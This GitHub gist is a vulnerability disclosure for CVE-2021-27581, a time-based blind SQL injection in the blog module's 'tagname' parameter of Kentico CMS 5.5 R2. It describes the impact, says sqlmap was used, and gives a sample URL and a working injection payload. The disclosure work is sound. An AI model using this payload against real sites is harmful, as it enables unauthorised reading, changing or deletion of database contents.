Skip to content

Instantly share code, notes, and snippets.

@stasinopoulos
Created March 3, 2021 08:21
Show Gist options
  • Save stasinopoulos/673ae3c31d703b4d67449f4d8888c686 to your computer and use it in GitHub Desktop.
Save stasinopoulos/673ae3c31d703b4d67449f4d8888c686 to your computer and use it in GitHub Desktop.
CVE-2021-27581
It was identified that the blog module in Kentico CMS 5.5 R2 (build 5.5.3996) is vulnerable to SQL injection attacks via “tagname” parameter, since user-controllable data is incorporated into database SQL queries in an unsafe manner.
This vulnerability can be leveraged by a potential attacker in order to interact with the back-end database and access/modify/delete stored data, interfere with application logic, escalate his privileges within the database and/or potentially take control of the database server.
The vulnerability was exploited using the sqlmap tool:
* Sample url: https://target.com/blog?tagname=test&groupid=1
* Vulnerable parameter: tagname
* Type: time-based blind sql injection
* Sample payload: tagname=test'+(SELECT CHAR(118)+CHAR(103)+CHAR(85)+CHAR(89) WHERE 1718=1718 AND 6176=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7))+'&groupid=1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment